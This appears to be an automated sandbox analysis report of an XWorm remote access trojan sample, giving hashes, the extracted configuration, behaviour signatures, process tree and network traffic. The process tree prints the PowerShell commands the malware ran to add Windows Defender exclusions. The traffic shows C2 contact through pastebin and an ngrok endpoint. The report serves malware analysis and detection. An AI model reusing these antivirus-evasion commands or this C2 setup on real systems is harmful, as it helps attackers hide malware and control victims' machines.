Resubmissions

03/09/2024, 14:02 UTC

240903-rb57sazdqf 10

03/09/2024, 13:51 UTC

240903-q59avszclf 10

02/09/2024, 19:51 UTC

240902-yk8gtsxbpd 10

02/09/2024, 02:27 UTC

240902-cxh7tazflg 10

02/09/2024, 02:26 UTC

240902-cwxc2sygll 10

21/06/2024, 19:37 UTC

240621-yca7cszgnd 10

09/06/2024, 17:07 UTC

240609-vm7rjadd73 10

13/05/2024, 17:36 UTC

240513-v6qblafe3y 10

12/05/2024, 17:17 UTC

240512-vty3zafh5s 10

Analysis

  • max time kernel
    148s
  • max time network
    153s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240508-en, locale:en-us, os:windows7-x64, system
  • submitted
    12/05/2024, 17:17 UTC

General

  • Target

    RAT/XClient.exe

  • Size

    172KB

  • MD5

    75ba783757c5b61bd841afa136fc3eda

  • SHA1

    8db9cda9508471a23f9b743027fa115e01bc1fe1

  • SHA256

    75a8719e83e4aecbe51287d7bfaf1e334fa190c7784324f24bcf61ab984de20a

  • SHA512

    9a6cfbf4302336662527837bf60b30b458f8d438bd6e9563093d4948bf81c79d56578e965d836e90aafde553d1cdc9c6df81a254aafcfb3379fbe6405dce0ea1

  • SSDEEP

    1536:vJcr5kCyoAp30kaF6CiJzt7UbjFdZe8e6TOAJkU7JsOpysa7iAMI:BcmNNxda6zZUbjHZe8jO6H2OpYuAf

Malware Config

Extracted

Family

xworm

Attributes
  • Install_directory

    %AppData%

  • install_file

    XClient.exe

  • pastebin_url

    https://pastebin.com/raw/2jTT3Lnj

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops startup file 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\RAT\XClient.exe
    "C:\Users\Admin\AppData\Local\Temp\RAT\XClient.exe"
    1⤵
    • Drops startup file
    • Adds Run key to start application
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1616
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RAT\XClient.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2724
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2628
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2756
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:548

Network

  • flag-us
    DNS
    ip-api.com
    XClient.exe
    Remote address:
    8.8.8.8:53
    Request
    ip-api.com
    IN A
    Response
    ip-api.com
    IN A
    208.95.112.1
  • flag-us
    GET
    http://ip-api.com/line/?fields=hosting
    XClient.exe
    Remote address:
    208.95.112.1:80
    Request
    GET /line/?fields=hosting HTTP/1.1
    Host: ip-api.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Sun, 12 May 2024 17:18:16 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 6
    Access-Control-Allow-Origin: *
    X-Ttl: 57
    X-Rl: 41
  • flag-us
    DNS
    pastebin.com
    XClient.exe
    Remote address:
    8.8.8.8:53
    Request
    pastebin.com
    IN A
    Response
    pastebin.com
    IN A
    104.20.3.235
    pastebin.com
    IN A
    104.20.4.235
    pastebin.com
    IN A
    172.67.19.24
  • flag-us
    GET
    https://pastebin.com/raw/2jTT3Lnj
    XClient.exe
    Remote address:
    104.20.3.235:443
    Request
    GET /raw/2jTT3Lnj HTTP/1.1
    Host: pastebin.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Sun, 12 May 2024 17:18:19 GMT
    Content-Type: text/plain; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    x-frame-options: DENY
    x-content-type-options: nosniff
    x-xss-protection: 1;mode=block
    cache-control: public, max-age=1801
    CF-Cache-Status: HIT
    Age: 2
    Last-Modified: Sun, 12 May 2024 17:18:17 GMT
    Server: cloudflare
    CF-RAY: 882c113e9afd60de-LHR
  • flag-us
    DNS
    7.tcp.eu.ngrok.io
    XClient.exe
    Remote address:
    8.8.8.8:53
    Request
    7.tcp.eu.ngrok.io
    IN A
    Response
    7.tcp.eu.ngrok.io
    IN A
    35.157.111.131
  • flag-us
    DNS
    7.tcp.eu.ngrok.io
    XClient.exe
    Remote address:
    8.8.8.8:53
    Request
    7.tcp.eu.ngrok.io
    IN A
    Response
    7.tcp.eu.ngrok.io
    IN A
    3.124.67.191
  • flag-us
    DNS
    7.tcp.eu.ngrok.io
    XClient.exe
    Remote address:
    8.8.8.8:53
    Request
    7.tcp.eu.ngrok.io
    IN A
    Response
    7.tcp.eu.ngrok.io
    IN A
    3.68.56.232
  • 208.95.112.1:80
    http://ip-api.com/line/?fields=hosting
    http
    XClient.exe
    264 B
    307 B
    4
    3

    HTTP Request

    GET http://ip-api.com/line/?fields=hosting

    HTTP Response

    200
  • 104.20.3.235:443
    https://pastebin.com/raw/2jTT3Lnj
    tls, http
    XClient.exe
    869 B
    5.7kB
    10
    10

    HTTP Request

    GET https://pastebin.com/raw/2jTT3Lnj

    HTTP Response

    200
  • 35.157.111.131:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
    120 B
    3
    3
  • 35.157.111.131:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
    120 B
    3
    3
  • 35.157.111.131:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
    120 B
    3
    3
  • 35.157.111.131:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
    120 B
    3
    3
  • 35.157.111.131:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
    120 B
    3
    3
  • 35.157.111.131:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
    120 B
    3
    3
  • 35.157.111.131:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
    120 B
    3
    3
  • 35.157.111.131:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
    120 B
    3
    3
  • 35.157.111.131:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
    120 B
    3
    3
  • 3.124.67.191:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
    120 B
    3
    3
  • 3.124.67.191:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
    120 B
    3
    3
  • 3.124.67.191:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
    120 B
    3
    3
  • 3.124.67.191:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
    120 B
    3
    3
  • 3.124.67.191:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
    80 B
    3
    2
  • 3.124.67.191:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
    120 B
    3
    3
  • 3.124.67.191:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
    120 B
    3
    3
  • 3.124.67.191:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
    120 B
    3
    3
  • 3.68.56.232:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
    120 B
    3
    3
  • 3.68.56.232:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
    120 B
    3
    3
  • 8.8.8.8:53
    ip-api.com
    dns
    XClient.exe
    56 B
    72 B
    1
    1

    DNS Request

    ip-api.com

    DNS Response

    208.95.112.1

  • 8.8.8.8:53
    pastebin.com
    dns
    XClient.exe
    58 B
    106 B
    1
    1

    DNS Request

    pastebin.com

    DNS Response

    104.20.3.235
    104.20.4.235
    172.67.19.24

  • 8.8.8.8:53
    7.tcp.eu.ngrok.io
    dns
    XClient.exe
    63 B
    79 B
    1
    1

    DNS Request

    7.tcp.eu.ngrok.io

    DNS Response

    35.157.111.131

  • 8.8.8.8:53
    7.tcp.eu.ngrok.io
    dns
    XClient.exe
    63 B
    79 B
    1
    1

    DNS Request

    7.tcp.eu.ngrok.io

    DNS Response

    3.124.67.191

  • 8.8.8.8:53
    7.tcp.eu.ngrok.io
    dns
    XClient.exe
    63 B
    79 B
    1
    1

    DNS Request

    7.tcp.eu.ngrok.io

    DNS Response

    3.68.56.232

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    89b21b247053d6078a488b25f9418948

    SHA1

    3bc31609ea0db6cce2ea19da940f1a7791efd49f

    SHA256

    f69e1e89ef2db2c4ec8f292e751a9ae2b2b8ccfb9505af440b2299c086fc2972

    SHA512

    4c07248e43c6faeb4e6a6426bc12bf443e1e200cec8170a743eb66ad718d400104b3bb4f7c8fbe5b04bd8315eca77e1bb443141d7a880b8ae4c87cd39d308b06

  • memory/1616-0-0x000007FEF50E3000-0x000007FEF50E4000-memory.dmp

    Filesize

    4KB

  • memory/1616-1-0x0000000001010000-0x0000000001040000-memory.dmp

    Filesize

    192KB

  • memory/1616-2-0x000007FEF50E0000-0x000007FEF5ACC000-memory.dmp

    Filesize

    9.9MB

  • memory/1616-32-0x000007FEF50E3000-0x000007FEF50E4000-memory.dmp

    Filesize

    4KB

  • memory/1616-33-0x000007FEF50E0000-0x000007FEF5ACC000-memory.dmp

    Filesize

    9.9MB

  • memory/2628-14-0x000000001B6D0000-0x000000001B9B2000-memory.dmp

    Filesize

    2.9MB

  • memory/2628-15-0x00000000022C0000-0x00000000022C8000-memory.dmp

    Filesize

    32KB

  • memory/2724-8-0x0000000002890000-0x0000000002898000-memory.dmp

    Filesize

    32KB

  • memory/2724-7-0x000000001B450000-0x000000001B732000-memory.dmp

    Filesize

    2.9MB
